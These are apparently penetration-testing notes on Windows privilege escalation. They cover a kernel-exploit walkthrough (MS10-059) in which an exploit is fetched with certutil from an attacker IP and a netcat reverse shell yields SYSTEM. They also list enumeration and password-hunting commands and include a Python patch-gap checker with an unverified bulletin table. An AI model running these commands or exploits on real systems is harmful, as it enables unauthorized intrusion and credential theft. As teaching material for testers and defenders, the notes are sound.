Notes - Windows Privilege Escalation
Privilege escalation is the act of a user or program obtaining privileges it was not granted. On Windows this usually means going from a low-privileged user to Administrator or NT AUTHORITY\SYSTEM, with the ability to install software, read and write system files, and control every other process on the box.
Note that the User Enumeration commands are listed right after the System Enumeration commands on purpose: knowing the output of whoami is almost always more important than knowing the output of wmic logicaldisk.
In this entry we will see how to escalate privileges via kernel exploits. There are several other escalation paths; they are listed further down these notes, just before the Kernel Exploits section, and the commands used in this walkthrough are collected there as well.
Let's see what the Windows Exploit Suggester tells us when we feed it sysinfo.txt. It reports several candidates, one of which is MS10-059, also known as Chimichurri. The suggester only compares the bulletin list against the hotfixes named in systeminfo, so treat its output as candidates to verify, and pick the exploit build that matches the architecture (this box is 32-bit).
Let's download the exploit from its GitHub page and start a simple HTTP server in the directory where the downloaded exploit is saved. The browser may block the download with a warning that the file is an exploit; tell it to keep the file anyway. Expect the same reaction from any antivirus running on the target, which is one reason the AV enumeration commands in these notes matter.
Now let's download the exploit onto the target machine from our own machine; my Kali's IP address is 10.10.14.5. On the target, move to a writable folder such as Temp and fetch the file with certutil (the exact command is in the Kernel Exploits listing).
Let's set up a netcat listener on the Kali machine, then run the exploit on the target, passing it the Kali IP address and the listener port. After a moment the netcat listener shows that we got a shell. Running whoami in that shell prints nt authority\system: we are now the system user. Easy.
System administrators and users should be aware of the potential for privilege escalation and take steps to secure their systems against it. Keeping the operating system and installed software up to date with the latest security patches comes first: a kernel exploit like the one above only works because a patch is missing, and the same systeminfo and wmic qfe output an attacker feeds to an exploit suggester tells a defender exactly which patches are absent. Strong password policies and security software that catches the staging steps (a binary fetched with certutil, an unexpected outbound connection from a new process) help as well.
Initial Enumeration Commands for Windows PE
System Enumeration
> systeminfo
> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
> whoami
> hostname
> wmic qfe
> wmic qfe get Caption,Description,HotFixID,InstalledOn
> wmic logicaldisk
> wmic logicaldisk get caption,description,providername
User Enumeration
> whoami /priv
> whoami /groups
> net user
> net user *USER*
> net user administrator
> net localgroup
> net localgroup administrators
Network Enumeration
> ipconfig
> ipconfig /all
> arp -a
> route print
> netstat -ano
Password Hunting
> findstr /si password *.config *.ini *.txt *.xml
> reg query "HKCU\Software\ORL\WinVNC3\Password"
> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
> reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
AV and Firewall Enumeration
> sc query windefend
> sc queryex type= service
> netsh advfirewall firewall dump
> netsh firewall show state
> netsh firewall show config
Escalation paths (this entry covers the first one):
- Kernel Exploits
- Passwords and Port Forwarding
- WSL
- Impersonation and Potato Attacks
- getsystem
- RunAs
- Registry
- Exe Files
- Startup Apps
- DLL Hijacking
- Service Permissions (Paths)
- CVE unrelated to the above paths
Kernel Exploits
What is a kernel? The kernel is the core of the operating system: it runs with the highest privilege on the machine, mediates every interaction between software and hardware, and enforces the boundary between user processes and the system. A kernel exploit abuses a bug in that code (or in a driver loaded into it), so the payload runs as SYSTEM rather than as the user who launched it; this is why a single missing kernel patch is enough to lose the box. Let's say that I have a Windows 7 32-bit machine that I have just gained access to as a low-privileged user. First things first, I copied the output of
> systeminfo
on the target to a file named sysinfo.txt on the Kali machine and fed it to the Windows Exploit Suggester (the hotfix list in that output is what it compares against its database):
# ./windows-exploit-suggester.py --database 2020-04-17-mssb.xls --systeminfo sysinfo.txt
Among its suggestions is MS10-059 (Chimichurri). Serve the downloaded exploit from the directory it was saved in:
# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 ...
Fetch it on the target (Kali is 10.10.14.5), from a writable folder such as Temp:
> certutil -urlcache -f http://10.10.14.5/MS10-059.exe ms.exe
Start the listener on Kali:
# nc -lvnp 5555
Listening on [any] 5555 ...
Run the exploit on the target, passing the Kali IP and the listener port:
> ms.exe 10.10.14.5 5555
In the shell that arrives at the listener:
> whoami
nt authority\system
We are now the system user.
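As an added example (not code from this page and not the windows-exploit-suggester project's own code), here is the check the suggester performs in the walkthrough above, reduced to its core: parse a systeminfo dump such as the one collected with the System Enumeration commands, pull out the OS name, architecture and installed KB list, and flag bulletins whose patch is absent. The systeminfo text is constructed, the bulletin table is abbreviated from memory (the MS10-059 to KB982799 mapping and the other rows should be checked against the Microsoft bulletin pages before being relied on), and the field names assume an English locale.

```python
"""Cross-reference a Windows `systeminfo` dump against a bulletin table,
the way windows-exploit-suggester does it. Added example for these notes;
the sample dump is constructed and the bulletin rows are illustrative."""
import re
from dataclasses import dataclass, field


@dataclass
class HostInfo:
    os_name: str
    os_version: str
    arch: str                       # "x86" or "x64", from the System Type field
    hotfixes: set = field(default_factory=set)


@dataclass(frozen=True)
class Bulletin:
    id: str
    kb: str
    products: tuple                 # substrings matched against OS Name
    title: str
    note: str = ""


# Abbreviated table (author's recollection; verify each KB before use).
# Affected-product lists are shortened to what the example needs.
BULLETINS = [
    Bulletin("MS10-059", "KB982799", ("Windows 7", "Windows Server 2008 R2"),
             "Tracing Feature for Services EoP", "Chimichurri (public exploit)"),
    Bulletin("MS15-051", "KB3045171", ("Windows 7", "Windows Server 2008 R2"),
             "Win32k.sys kernel-mode driver EoP"),
    Bulletin("MS16-032", "KB3143141", ("Windows 7", "Windows Server 2008 R2", "Windows 10"),
             "Secondary Logon EoP"),
    Bulletin("CVE-2020-0796", "KB4551762", ("Windows 10",),
             "SMBv3 compression (SMBGhost)"),
]

# Constructed sample: a trimmed Windows 7 32-bit `systeminfo` dump, three hotfixes.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN7-VICTIM
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
System Type:               X86-based PC
Total Physical Memory:     2,047 MB
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB2999226
                           [03]: KB3045171
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

_FIELD = re.compile(r"^([A-Za-z][A-Za-z /()]*?):\s*(.*)$")   # "OS Name:   value"
_KB = re.compile(r"\bKB(\d+)\b")


def parse_systeminfo(text):
    """Extract OS name/version, architecture and installed KBs from systeminfo output."""
    fields = {}
    for line in text.splitlines():
        # Continuation lines (the "[01]: KB..." entries) start with whitespace and
        # carry no field name, so the anchored regex skips them automatically.
        m = _FIELD.match(line)
        if m:
            fields[m.group(1).strip().lower()] = m.group(2).strip()
    hotfixes = {"KB" + n for n in _KB.findall(text)}
    arch = "x64" if "x64" in fields.get("system type", "").lower() else "x86"
    return HostInfo(fields.get("os name", ""), fields.get("os version", ""), arch, hotfixes)


def missing_bulletins(host, bulletins=BULLETINS):
    """Bulletins that apply to this OS and whose KB is absent, newest id first.

    A hit means the KB string is not in systeminfo, not that the bug is present:
    later rollups supersede older KBs under different numbers, so every
    candidate must be verified (and matched to host.arch) before running anything.
    """
    os_name = host.os_name.lower()
    hits = [b for b in bulletins
            if any(p.lower() in os_name for p in b.products) and b.kb not in host.hotfixes]
    return sorted(hits, key=lambda b: b.id, reverse=True)


def report(host, bulletins=BULLETINS):
    """Summary in the spirit of the suggester's output, as a single string."""
    lines = [f"{host.os_name} ({host.os_version}, {host.arch}); "
             f"{len(host.hotfixes)} hotfixes installed"]
    for b in missing_bulletins(host, bulletins):
        tag = f" - {b.note}" if b.note else ""
        lines.append(f"[E] {b.id}: {b.kb} not installed - {b.title}{tag}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(parse_systeminfo(SAMPLE_SYSTEMINFO)))
```

On the constructed dump the report lists MS16-032 and MS10-059 as missing and stays silent on MS15-051 (its KB is installed) and on the Windows 10 only entry; that is exactly the filtering a suggester does, and also exactly why its hits are candidates rather than confirmed holes.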